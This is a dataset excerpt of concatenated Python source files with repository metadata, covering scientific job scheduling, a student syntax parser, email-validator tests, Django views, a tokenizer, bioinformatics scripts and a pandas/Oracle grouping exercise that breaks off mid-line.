dict((job+1, job+1) for job in range(len(self.longJobList)))\n print(\"Creating burstegardJobMap\")\n self.burstegardJobMap = dict((job+1, job+1) for job in range(len(self.burstegardPreprocJobList)))\n print(\"Done creating possible jobs\")\n #print(\"In object\")\n #print(self.jobList)\n\n def alignIntervals(self, time_segments, pixel_duration):\n #print(\"test\")\n #print(time_segments)\n end_buffer = (self.NSPI - 1)*pixel_duration/2 + self.bufferSeconds\n front_time = time_segments[0][0]\n #print(front_time)\n #print(time_segments[0])\n temp_intervals = [x if (x[0] - front_time) % (pixel_duration/2) == 0 else [x[0] + ((x[0] - front_time) % (pixel_duration/2)), x[1]] for x in time_segments]\n #print(temp_intervals)\n temp_intervals = [x if (x[1] - x[0] - 2*self.bufferSeconds) % (pixel_duration/2) == 0 else [x[0], x[1] - ((x[1] - x[0] - 2*self.bufferSeconds) % (pixel_duration/2))] for x in temp_intervals]\n #print(temp_intervals)\n return temp_intervals\n\n def cutBadTimes(self, interval, bad_times):\n tempBadTimes = [x for x in bad_times if interval[0] <= x < interval[1]]\n if len(tempBadTimes) > 0:\n timeList = []\n if tempBadTimes[0] > interval[0]:\n timeList += [[interval[0], tempBadTimes[0]]]\n if len(tempBadTimes) > 1:\n timeList += [[tempBadTimes[num] + 1, tempBadTimes[num+1]] for num in range(len(tempBadTimes)-1)]\n if tempBadTimes[-1] + 1 < interval[1]:\n timeList += [[tempBadTimes[-1] + 1, interval[1]]]\n else:\n timeList = [interval]\n return timeList\n\n def findJobTimeNotDuringVeto(self, interval, post_veto_times, bad_times, pixel_duration):\n post_times_of_interest = [x for x in post_veto_times if x[0] < interval[1] and x[1] > interval[0]]\n num_times = len(post_times_of_interest)\n if num_times > 1:\n times = [[max([interval[0], post_times_of_interest[0][0]]), post_times_of_interest[0][1]]]\n if num_times > 2:\n times += post_times_of_interest[1:-1]\n times += [[post_times_of_interest[-1][0], min([interval[1], post_times_of_interest[-1][1]])]]\n elif num_times == 1:\n times = [[max([interval[0], post_times_of_interest[0][0]]), min([interval[1], post_times_of_interest[0][1]])]]\n else:\n times = []\n if len(times) > 0:\n #print(times)\n if bad_times:\n times = [self.cutBadTimes(x, bad_times) for x in times]\n #print(times)\n times = [x for y in times for x in y]\n #print(times)\n times = self.alignIntervals(times, pixel_duration)\n #print(times)\n times = [x for x in times if x[1] - x[0] >= self.NSPI * pixel_duration + self.bufferSeconds*2]\n return times\n\n def findPostVetoJobs(self, post_veto_times, bad_times):\n print(\"Creating post veto jobs\")\n temp_interval_list_long = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.longPixelDuration) for x in self.longJobs]\n temp_interval_list_short = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.shortJobs]\n temp_burstegard_interval_list = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.longJobs]\n temp_full_list = [[temp_interval_list_long[num], temp_interval_list_short[num]] for num in range(len(temp_interval_list_long))]\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n temp_job_counter = 0\n self.jobMap = {}\n # map jobs\n for num in range(len(flat_temp_full_list)):\n old_job_num = num + 1\n num_new_jobs = len(flat_temp_full_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.jobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.burstegardJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_burstegard_interval_list)):\n old_job_num = num + 1\n num_new_jobs = len(temp_burstegard_interval_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.burstegardJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.longJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_interval_list_long)):\n old_job_num = num + 1\n num_new_jobs = len(temp_interval_list_long[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.longJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n #print(old_job_num)\n #print(temp_job_counter)\n temp_job_counter += num_new_jobs\n #print(temp_interval_list_long)\n #print(self.longJobMap)\n flat_interval_list = [y for x in flat_temp_full_list for y in x]\n flat_long_interval_list = [y for x in temp_interval_list_long for y in x]\n flat_long_burstegard_list = [y for x in temp_burstegard_interval_list for y in x]\n self.preprocJobList = [[num + 1] + flat_interval_list[num] + [flat_interval_list[num][1] - flat_interval_list[num][0]] for num in range(len(flat_interval_list))]\n self.longJobList = [[num + 1] + flat_long_interval_list[num] + [flat_long_interval_list[num][1] - flat_long_interval_list[num][0]] for num in range(len(flat_long_interval_list))]\n self.burstegardPreprocJobList = [[num + 1] + flat_long_burstegard_list[num] + [flat_long_burstegard_list[num][1] - flat_long_burstegard_list[num][0]] for num in range(len(flat_long_burstegard_list))]\n print(\"Complete\")\n\n \"\"\"\n def findPostVetoJobs(self, post_veto_times, bad_times):\n print(\"Creating post veto jobs\")\n temp_interval_list_long = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.longPixelDuration) for x in self.longJobs]\n temp_interval_list_short = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.shortJobs]\n temp_full_list = [[temp_interval_list_long[num], temp_interval_list_short[num]] for num in range(len(temp_interval_list_long))]\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n temp_job_counter = 0\n self.jobMap = {}\n # map jobs\n for num in range(len(flat_temp_full_list)):\n old_job_num = num + 1\n num_new_jobs = len(flat_temp_full_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.jobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.burstegardJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_interval_list_long)):\n old_job_num = num + 1\n num_new_jobs = len(temp_interval_list_long[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.burstegardJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n flat_interval_list = [y for x in flat_temp_full_list for y in x]\n flat_long_interval_list = [y for x in temp_interval_list_long for y in x]\n self.preprocJobList = [[num + 1] + flat_interval_list[num] + [flat_interval_list[num][1] - flat_interval_list[num][0]] for num in range(len(flat_interval_list))]\n self.burstegardPreprocJobList = [[num + 1] + flat_long_interval_list[num] + [flat_long_interval_list[num][1] - flat_long_interval_list[num][0]] for num in range(len(flat_long_interval_list))]\n print(\"Complete\")\"\"\"\n\n def saveJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in self.preprocJobList)\n saveText(job_file_name, output_text)\n\n def saveBurstegardJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in self.burstegardPreprocJobList)\n saveText(job_file_name, output_text)\n\n def saveLongJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in self.longJobList)\n saveText(job_file_name, output_text)\n\ndef create_jobs_from_interval(interval, job_start_difference, temp_effective_job_length):\n #print(\"Calculating jobs for interval \" + str(interval))\n #print(temp_effective_job_length)\n number_jobs = int((interval[1] - interval[0])//(job_start_difference))\n temp_jobs = [[interval[0] + y*(job_start_difference), interval[0] + y*(job_start_difference) + temp_effective_job_length]\n for y in range(number_jobs)]\n if not temp_jobs:\n if interval[1] - interval[0] >= temp_effective_job_length:\n temp_jobs = [[interval[0], interval[0] + temp_effective_job_length]]\n elif interval[1] - temp_jobs[-1][1] >= job_start_difference:\n print(\"extra job\")\n print(\"temp_effective_job_length\")\n print(temp_effective_job_length)\n print([interval[1] - temp_effective_job_length, interval[1]])\n print(\"\\n\\n\\n\")\n temp_jobs += [[interval[1] - temp_effective_job_length, interval[1]]]\n #print(str(number_jobs) + \" jobs created\")\n return temp_jobs\n","sub_path":"create_config_file/generateInputFileLib.py","file_name":"generateInputFileLib.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513490828","text":"from Lab5_SP2.Stack import Stack\r\nimport Lab5_SP2.Utils as ut\r\nfrom termcolor import colored\r\n\r\n\r\ndef parse_to_tree(string):\r\n string += \" \"\r\n output = \"\"\r\n i = 0\r\n tabs = \"\"\r\n st = Stack()\r\n st1 = Stack()\r\n while len(string) > 0:\r\n\r\n root = string[:string.index(\" \")]\r\n if root == \"for\":\r\n root = string[:string.index(\"do\") + 2]\r\n string = string[len(root) + 1:]\r\n output += \"\\t\" * i + \"for_loop statement\\n\"\r\n i += 1\r\n elif root == \"if\":\r\n root = string[:string.index(\"then\") + 4]\r\n string = string[len(root) + 1:]\r\n st1.push(i)\r\n output += \"\\t\" * i + \"if_node\\n\" + \"\\t\" * i +\" bool_expression\\n\" + \"\\t\" * i + \" then_node\\n\"\r\n i += 1\r\n elif root == \"begin\":\r\n string = string[len(root) + 1:]\r\n st.push(i)\r\n #output += \"\\t\" * i + \"begin_node\" + \"\\n\"\r\n elif root == \"end;\":\r\n string = string[len(root) + 1:]\r\n\r\n #output += \"\\t\" * st.pop() + \"end_node\" + \"\\n\"\r\n elif root == \"else\":\r\n string = string[len(root) + 1:]\r\n i = st1.pop()\r\n output += \"\\t\" * i + \"else_node\" + \"\\n\"\r\n i += 1\r\n else:\r\n root = string[:string.index(\"end;\")]\r\n output += \"\\t\" * i + \"expression\" + \"\\n\"\r\n string = string[len(root):]\r\n i += 1\r\n\r\n print(output)\r\n # print(string)\r\n\r\n\r\ndef check_syntax(string):\r\n check = True\r\n tokens = [\"for\", \"to\", \"do\", \"begin\", \"if\", \"then\", \"else\",\r\n \"begin\", \"end\", \":=\", \">\", \"<\", \">=\", \"<=\", \"=\",\r\n \"(\", \")\", \";\", \"[\", \"]\"]\r\n inp = string.split(\" \")\r\n\r\n if not ut.begin_end_checker(inp):\r\n print(colored('Exception: wrong number of \"begin\" and \"end\" words', 'red'))\r\n return False\r\n\r\n if not ut.brackets_checker(string):\r\n print(colored('Exception: wrong number of brackets', 'red'))\r\n return False\r\n\r\n if not ut.for_loop_checker(inp):\r\n print(colored('Exception: wrong loop', 'red'))\r\n return False\r\n\r\n if not ut.if_else_checker(inp):\r\n print(colored('Exception: if-then-else checker', 'red'))\r\n return False\r\n\r\n if not ut.check_semicol(inp):\r\n print(colored('Exception: missing \";\"', 'red'))\r\n return False\r\n\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n input_str = \"if (a > b) then begin for i := 1 to do k:=5; end;\"\r\n\r\n print(colored(input_str, 'green'))\r\n\r\n if check_syntax(input_str):\r\n print(\"Syntax is correct\")\r\n print(\"Tree:\")\r\n parse_to_tree(input_str)\r\n print(\"Table:\")\r\n ut.print_table(input_str.split(\" \"))\r\n else:\r\n print(\"Syntax error\")\r\n","sub_path":"V семестр/Системне програмування - 2/Бровченко/sys_prog/Lab5_SP2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220663435","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom validators import email, ValidationFailure\n\n\n@pytest.mark.parametrize(('value', 'whitelist'), [\n ('email@here.com', None),\n ('weirder-email@here.and.there.com', None),\n ('email@[127.0.0.1]', None),\n ('example@valid-----hyphens.com', None),\n ('example@valid-with-hyphens.com', None),\n ('test@domain.with.idn.tld.उदाहरण.परीक्षा', None),\n ('email@localhost', None),\n ('email@localdomain', ['localdomain']),\n ('\"test@test\"@example.com', None),\n ('\"\\\\\\011\"@here.com', None),\n])\ndef test_returns_true_on_valid_email(value, whitelist):\n assert email(value, whitelist=whitelist)\n\n\n@pytest.mark.parametrize(('value',), [\n (None,),\n ('',),\n ('abc',),\n ('abc@',),\n ('abc@bar',),\n ('a @x.cz',),\n ('abc@.com',),\n ('something@@somewhere.com',),\n ('email@127.0.0.1',),\n ('example@invalid-.com',),\n ('example@-invalid.com',),\n ('example@inv-.alid-.com',),\n ('example@inv-.-alid.com',),\n (\n 'john56789.john56789.john56789.john56789.john56789.john56789.john5'\n '@example.com',\n ),\n # Quoted-string format (CR not allowed)\n ('\"\\\\\\012\"@here.com',),\n])\ndef test_returns_failed_validation_on_invalid_email(value):\n assert isinstance(email(value), ValidationFailure)\n","sub_path":"tests/test_email.py","file_name":"test_email.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178035738","text":"from django.contrib import admin\nfrom namelist.models import Category, Player\n\n\nclass PlayerAdmin(admin.ModelAdmin):\n list_display = ['name', 'category']\n list_filter = ['category', 'group_name']\n\nadmin.site.register(Category)\nadmin.site.register(Player, PlayerAdmin)\n","sub_path":"brains/namelist/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"164364569","text":"from typing import List\n\nfrom kai.tokenizer.constants import is_whitespace, is_fullstop, is_hyphen\nfrom kai.tokenizer.constants import is_singlequote, is_doublequote, is_specialcharacter\nfrom kai.tokenizer.constants import is_punctuation, is_numeric, is_ABC\nfrom kai.parser.model import Token\n\nno_space_before = {\";\", \"n't\", \"'s\", \"'ll\", \".\", \",\", \"?\", \"!\", \":\", \"'m\", \"'re\", \")\", \"]\", \"}\", \"’ve\"}\nno_space_after = {\"(\", \"[\", \"{\"}\n\n\nclass Tokenizer:\n def __init__(self):\n self.punc = {}\n for ch in \"!,.?;\":\n self.punc[ch] = True\n\n # turn a string into a list of tokens using pre-defined constants\n def tokenize_string(self, in_str: str) -> List[str]:\n token_list = []\n length = len(in_str)\n i = 0\n tokenIndex = 0\n while i < length:\n\n tokenHandled = False # stop when we have the token done\n ch = in_str[i]\n while is_whitespace(ch) and i < length:\n tokenHandled = True\n i = i + 1\n if i < length:\n ch = in_str[i]\n\n if tokenHandled: # single whitespace\n token_list.append(\" \")\n\n # add full-stops?\n while is_fullstop(ch) and i < length:\n tokenHandled = True\n token_list.append(\".\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add hyphens?\n while is_hyphen(ch) and i < length:\n tokenHandled = True\n token_list.append(\"-\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add single quotes?\n while is_singlequote(ch) and i < length:\n tokenHandled = True\n token_list.append(\"'\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add single quotes?\n while is_doublequote(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\\\"\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add special characters ( ) etc.\n while is_specialcharacter(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\" + ch)\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add punctuation ! ? etc.\n while is_punctuation(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\" + ch)\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # numeric processor\n helper = []\n while is_numeric(ch) and i < length:\n tokenHandled = True\n helper.append(ch)\n i += 1\n if i < length:\n ch = in_str[i]\n\n if len(helper) > 0:\n token_list.append(''.join(helper))\n tokenIndex += 1\n\n # text processor\n helper = []\n while is_ABC(ch) and i < length:\n tokenHandled = True\n helper.append(ch)\n i += 1\n if i < length:\n ch = in_str[i]\n\n if len(helper) > 0:\n token_list.append(''.join(helper))\n tokenIndex += 1\n\n # discard unknown token?\n if not tokenHandled:\n token_list.append(ch)\n i += 1 # skip\n\n return token_list\n\n # remove spaces from a list of tokens\n def filter_spaces(self, token_list: List[str]) -> List[str]:\n new_token_list = []\n for token in token_list:\n if token != \" \":\n new_token_list.append(token)\n return new_token_list\n\n # remove punctuation from a set\n def filter_punctuation(self, token_list: List[str]) -> List[str]:\n new_token_list = []\n for token in token_list:\n if token not in self.punc:\n new_token_list.append(token)\n return new_token_list\n\n\n# pretty print a sentence of tokens removing spaces where they're not needed as best as possible\ndef token_list_to_string(token_list: List[Token]):\n list = []\n quote = 0\n for token in token_list:\n text = token.text\n if text in no_space_before: # remove spaces before the current item?\n if len(list) > 0 and list[-1] == ' ':\n list = list[0:-1]\n if text == '\"': # quote counting\n quote += 1\n if text == '\"' and quote % 2 == 0: # end quotes\n if len(list) > 0 and list[-1] == ' ':\n list = list[0:-1]\n list.append(text)\n list.append(\" \")\n elif text == '\"': # start quote\n list.append(text)\n elif text in no_space_after: # no spaces after this token category\n list.append(text)\n else: # all other items\n list.append(text)\n list.append(\" \")\n return ''.join(list)\n","sub_path":"kai/tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"359397602","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom .models import Item, Category\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.db.models.functions import Lower\n\n# Create your views here.\n\n\ndef all_items(request):\n items = Item.objects.all()\n query = None\n categories = None\n sort = None\n direction = None\n\n if request.GET:\n if 'sort' in request.GET:\n sortkey = request.GET['sort']\n sort = sortkey\n if sortkey == 'name':\n sortkey = 'lower_name'\n items = items.annotate(lower_name=Lower('name'))\n\n if 'direction' in request.GET:\n direction = request.GET['direction']\n if direction == 'desc':\n sortkey = f'-{sortkey}'\n items = items.order_by(sortkey)\n\n if 'category' in request.GET:\n categories = request.GET['category'].split(',')\n items = items.filter(category__name__in=categories)\n\n categories = Category.objects.filter(name__in=categories)\n\n if 'q' in request.GET:\n query = request.GET['q']\n if not query:\n messages.error(\n request, \"You didn't enter any search criteria!\")\n return redirect(reverse('items'))\n\n queries = Q(name__icontains=query) | Q(\n description__icontains=query)\n items = items.filter(queries)\n\n current_sorting = f'{sort}_{direction}'\n\n context = {\n 'items': items,\n 'search_term': query,\n 'current_categories': categories,\n 'current_sorting': current_sorting,\n }\n\n return render(request, 'items/items.html', context)\n\n\ndef item_detail(request, item_id):\n \"\"\" A view to show individual item details \"\"\"\n\n item = get_object_or_404(Item, pk=item_id)\n\n context = {\n 'item': item,\n }\n\n return render(request, 'items/item_detail.html', context)\n","sub_path":"items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453847786","text":"import sys\nfrom Bio import SeqIO\nimport json\n\ninput_path=sys.argv[1]\n\nalign_len=len(next(SeqIO.parse(input_path,\"fasta\")).seq)\ntit_pos100_arr_dic=dict((seqr.id,[i for i in range(align_len//100+1) if len(seqr.seq[i*100:i*100+99].strip(\"-\"))])for seqr in SeqIO.parse(input_path,\"fasta\"))\n#json.dump(tit_pos100_arr_dic,open(input_path+\".json\",\"w\"))\n\n\npos100_tit_arr_arr=[[] for i in range(align_len//100+1)]\n\nfor tit,pos100_arr in tit_pos100_arr_dic.items():\n\tfor pos in pos100_arr:\n\t\tpos100_tit_arr_arr[pos]=pos100_tit_arr_arr[pos]+[tit]\njson.dump(pos100_tit_arr_arr,open(input_path+\".json\",\"w\"))\t\n","sub_path":"View_mafft_alignment.py","file_name":"View_mafft_alignment.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350892829","text":"\ndef revcompl(seq):\n rev = {'A':'T', 'T':'A', 'C':'G', 'G':'C'}\n return ''.join(rev[a] for a in seq)\n\ndef reading(soubor):\n file = open(soubor,'r')\n seq = ''\n for line in file:\n line = line.strip()\n if line[0] != '>':\n seq += line\n\n return seq\n\ndef palindrome(seq, revseq):\n index = []\n for i in range(len(seq)):\n for j in range(12, 2,-1):\n FLAG = True\n if i + j >= len(revseq):\n continue\n if revseq[i + j] == seq[i]:\n\n for k in range(j//2 + (j%2) + 1):\n\n if seq[i + k] != revseq[i + j - k]:\n FLAG = False\n break\n if FLAG:\n print(i + 1,j + 1)\n index.append((i + 1, j + 1))\n\n return index\n\n\n\nseq = reading('input')\nrevstring = revcompl(seq)\n\nprint(seq)\nprint(revstring)\nprint(palindrome(seq, revstring))\n","sub_path":"REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235712051","text":"import os\nfrom sys import argv\n\n_, zipfile = argv\n\nos.system('unzip ' + zipfile)\nfail = False\n\nif not os.path.exists(zipfile[:-4] + '/compile.sh'):\n\tfail = True\n\tprint('missing compile.sh')\n\nif not os.path.exists(zipfile[:-4] + '/run.sh'):\n\tfail = True\n\tprint('missing run.sh')\n\nif not os.path.exists(zipfile[:-4] + '/writeup.txt'):\n\tfail = True\n\tprint('missing writeup.txt')\n\nif not os.path.exists(zipfile[:-4] + '/compile_bonus.sh'):\t\n\tprint('missing compile_bonus.sh')\n\nif not os.path.exists(zipfile[:-4] + '/run_bonus.sh'):\t\n\tprint('missing run_bonus.sh')\n\nif not os.path.exists(zipfile[:-4] + '/writeup.pdf'):\t\n\tprint('missing writeup.pdf')\n\nif fail: \n\tprint('========================\\nNOT READY FOR SUBMISSION\\n========================')\nelse:\n\tprint('======\\nPASSED\\n======')\n","sub_path":"src/src2/formatchecker.py","file_name":"formatchecker.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632969032","text":"# NOTE: You must run this script from a terminal console or another script using the os library\n# To Run the Script try the following:\n# python argparse_simple.py -h\n# python argparse_simple.py name Mike\nimport argparse\n\n\ndef process(args):\n name = args.name\n print('*' * 20)\n print('Running...')\n print('Is birthday value %s' % args.is_birthday )\n print('*' * 20)\n if (args.is_birthday == 'Y'):\n print('Happy Birthday %s!' % name)\n else:\n print('Hello, %s.' % name)\n\n\ndef run():\n # Sets up the parser with a description for help\n # If you call this with -h or --help, it will automatically show this description and exit\n parser = argparse.ArgumentParser(description=\"Simple argparse! Prints Hello or Dynamic Messages based on having the correct arguments.\")\n\n # Add in a positional argument. These are mandatory, so if you don't include, it won't work\n parser.add_argument('name', help=\"your name for saying hello to\")\n\n # Add in an optional argument.\n # For now use simple Y or N\n parser.add_argument('--is_birthday', help=\"True or False if it's your birthday today (Y or N)\")\n\n # Parse the Arguments and determine if can proceed or exist if it's help\n args = parser.parse_args()\n\n # Print the Args\n print('Here are the args...')\n print(args)\n\n # Take all of the captured arguments and send to the run() method for processing\n process(args)\n\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"argparse_simple.py","file_name":"argparse_simple.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553213033","text":"from __future__ import division\nimport numpy as np\ndef fdcoeffF(k,xbar,x):\n\tn = len(x)\n\tif k >= n:\n\t\traise ArithmeticError(\"The length of x must be larger than k\")\n\n\tm = k\n\tc1 = 1\n\tc4 = x[0] - xbar\n\tc = np.zeros((n-1,m+1))\n\tc[0,0] = 1\n\tfor i in range(0,n-1):\n\t\ti1 = i + 1\n\t\tmn = min(i,m)\n\t\tc2 = 1\n\t\tc5 = c4 \n\t\tc4 = x[i1] - xbar\n\t\tfor j in range(-1,i-1):\n\t\t\tj1 = j + 1\n\t\t\tc3 = x[i1] - x[j1]\n\t\t\tc2 = c2 * c3\n\t\t\tif j == i - 1:\n\t\t\t\tfor s in range(mn-1,0,-1):\n\t\t\t\t\ts1 = s + 1\n\t\t\t\t\tc[i1,s1] = c1*(s*c[i1-1,s1-1] - c5*c[i1-1,s1])/c2\n\t\t\t\tc[i1,1] = -c1*c5*c[i1-1,1]/c2\n\t\t\tfor s in range(mn-1,0,-1):\n\t\t\t\ts1 = s + 1\n\t\t\t\tc[j1,s1] = (c4*c[j1,s1] - s*c[j1,s1-1])/c3 \n\t\t\tc[j1,1] = c4*c[j1,1]/c3\n\t\tc1 = c2\n\treturn c[:,len(c[0]) - 1]\n\n\n","sub_path":"Documents/MATH432/fdstencil.py","file_name":"fdstencil.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"305493708","text":"import matplotlib.pyplot as plt\nimport stregion\n\nimport math\n\ntry:\n from astropy.io import fits as pyfits\nexcept ImportError:\n from astropy.io import fits as pyfits\n\n# At some point, pyfits.Card.fromstring has changed from unbound\n# method to bounded method.\n\nif pyfits.Card.fromstring.__self__: # \n def pyfits_card_fromstring(l):\n return pyfits.Card.fromstring(l)\nelse:\n def pyfits_card_fromstring(l):\n c = pyfits.Card()\n return c.fromstring(l)\n\ndef demo_header():\n cards = pyfits.CardList()\n for l in open(\"sample_fits01.header\"):\n card = pyfits_card_fromstring(l.strip())\n cards.append(card)\n h = pyfits.Header(cards)\n return h\n\n\ndef show_region(fig, region_list):\n h = demo_header()\n\n n = len(region_list)\n nx = int(math.ceil(n**.5))\n ny = int(math.ceil(1.*n/nx))\n\n\n nrows_ncols = (ny, nx)\n\n grid = [plt.subplot(ny, nx, i+1) for i in range(n)]\n\n for ax, reg_name in zip(grid, region_list):\n ax.set_aspect(1)\n\n r = stregion.open(reg_name).as_imagecoord(h)\n\n patch_list, text_list = r.get_mpl_patches_texts()\n for p in patch_list:\n ax.add_patch(p)\n for t in text_list:\n ax.add_artist(t)\n\n if plt.rcParams[\"text.usetex\"]:\n reg_name = reg_name.replace(\"_\", r\"\\_\")\n ax.set_title(reg_name, size=10)\n for t in ax.get_xticklabels() + ax.get_yticklabels():\n t.set_visible(False)\n\n return grid\n\n","sub_path":"examples/demo_helper.py","file_name":"demo_helper.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238800268","text":"# coding=utf-8\n'''\n실습 : \n집계 함수(pandas.Series 또는 pandas.DataFrame 클래스가 가지고 있는 메소드들: count, mean, sum.. ) 사용하여\nDataFrame 에서 grouping 하여 특정한 열 추출\n'''\nimport csv\nimport pandas as pd\nimport cx_Oracle\n\nfrom lab_python.scratch09.ex10 import select_all_from\n\n\ndef peak_to_peak(x):\n return x.max() - x.min()\n\n\nif __name__ == '__main__':\n # with~as 구문을 사용, oracle db server 접속\n dsn = cx_Oracle.makedsn('localhost', 1521, 'orcl')\n with cx_Oracle.connect('scott', 'tiger', dsn) as connection:\n # with~as 구문을 사용, cursor 객체 생성\n with connection.cursor() as cursor:\n emp_df = select_all_from('emp', cursor)\n # cursor.execute('select * from emp')\n # emp = [row for row in cursor]\n # scratch09 패키지에서 테이블 전체 검색 함수를 사용해서(import) emp_df 데이터 프레임을 생성\n # file_path = 'emp.csv'\n\n # emp_df 를 csv 파일로 저장 (오라클 연결 안해도 읽어올 수 있도록)\n # with open(file_path, mode='w', encoding='UTF-8', newline='') as f:\n # writer = csv.writer(f)\n # for item in emp:\n # writer.writerow(item)\n emp_df.to_csv('emp_df.csv', index=False)\n # emp_df = pd.read_csv('emp.csv', header=None)\n # emp_df.columns = ['empno', 'ename', 'job', 'mgr', 'hiredate', 'sal', 'comm', 'deptno']\n # print(emp_df)\n\n # emp_df 에서 부서별 평균 급여를 출력\n g1 = emp_df.groupby(by='DEPTNO')\n emp_sal = g1['SAL']\n print(emp_sal.mean()) # 가능!\n # emp_df 에서 부서별 인원수를 출력 (primary key)\n dept_cnt = g1['EMPNO'].count()\n print(dept_cnt)\n # emp_df 에서 부서별 급여 최솟값 출력\n min_sal = g1['SAL'].min()\n print(min_sal)\n # emp_df 에서 부서별 급여 최댓값 출력\n max_sal = g1['SAL'].max()\n print(max_sal)\n\n # 1) DataFrame 으로 만들기! -> deptno는 index! (label)\n all_df = pd.DataFrame({\n 'count': dept_cnt,\n 'mean': emp_sal.mean(),\n 'min': min_sal,\n 'max': max_sal\n })\n print(all_df)\n print(all_df.shape)\n\n # 2) agg(), aggregate() 사용\n # 2) - 1 : ['함수이름', '함수이름', .. ]\n # agg(), aggregate() 두 개 다 똑같은 함수: 파라미터에 함수 이름을 전달하면 groupby 객체에 함수를 적용한다.\n all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max'])\n print(all_df2)\n # 함수가 집계 함수(pandas.Series 또는 pandas.DataFrame 클래스가 가지고 있는 메소드들: count, mean, sum.. )인 경우에 함수 이름을 문자열로 전달한다.\n # g1.mean() = g1.agg('mean')\n print(emp_sal.agg(pd.Series.mean)) # <-> print(emp_sal.agg(mean)) error! mean 이라는 함수를 정의할 수 없어서 (pd.Series.mean)\n # 모든 함수 이름을 문자열로 주는 것은 아니니 주의하자 : 정확히는 함수의 이름을 주어야 하는 것 원칙! - 직접 작성한 함수는 함수 이름을 그냥 파라미터에 전달해요~ ('' 없음)\n # ex\n # all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max', 'peak_to_peak']) error!\n # peak_to_peak : 함수 이름만 써준다. peak_to_peak()는 바로 호출하는 함수이므로 여기서 실행하면 안됨!\n all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max', peak_to_peak])\n\n # 위의 모든 작업을 직책별로 직원수, 급여 평균, 최소, 최댓값 출력\n grouped_by_job = emp_df.groupby('JOB')\n sal_by_job = grouped_by_job['SAL']\n # grouped_by_job = emp_df.groupby('JOB')['SAL'] 로도 